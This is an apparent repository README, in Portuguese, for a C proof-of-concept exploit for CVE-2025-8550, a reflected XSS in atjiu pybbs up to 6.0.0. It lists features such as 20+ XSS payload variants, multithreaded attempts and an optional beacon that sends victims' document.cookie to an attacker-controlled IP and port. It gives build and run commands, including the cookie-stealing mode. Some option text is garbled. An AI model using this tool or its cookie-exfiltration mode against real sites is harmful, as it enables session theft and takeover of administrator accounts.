
Exploit de XSS para CVE-2025-8550 no atjiu pybbs ≤6.0.0
Este repositório contém um exploit automatizado de Prova de Conceito (PoC) para a CVE-2025-8550, uma vulnerabilidade de Cross‑Site Scripting (XSS) refletido no atjiu pybbs (≤ v6.0.0). Ele tem como alvo o parâmetro username do endpoint /admin/topic/list, que não possui sanitização adequada de entrada.
Mais de 20 variações de payload: script, SVG, iframe, object, manipuladores onerror e mais.
Codificação automática de URL: garante injeção segura através do curl_easy_escape do libcurl.
Exfiltração de Cookies (Opcional): injeção de beacon para enviar document.cookie para um servidor controlado pelo atacante.
Multithreading: utiliza pthreads para paralelizar tentativas e acelerar os testes.
CLI personalizável: alimentado por argparse, suporta especificar:
-u / --url)-c / --cookies)-k / --cokpay)-i / --ip, -p / --port)-v / --verbose)# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET> pela sua instância do atjiu pybbs.-k para ativar o beacon de roubo de cookies (requer -i e -p).-c se não forem necessários cookies de autenticação.Licença MIT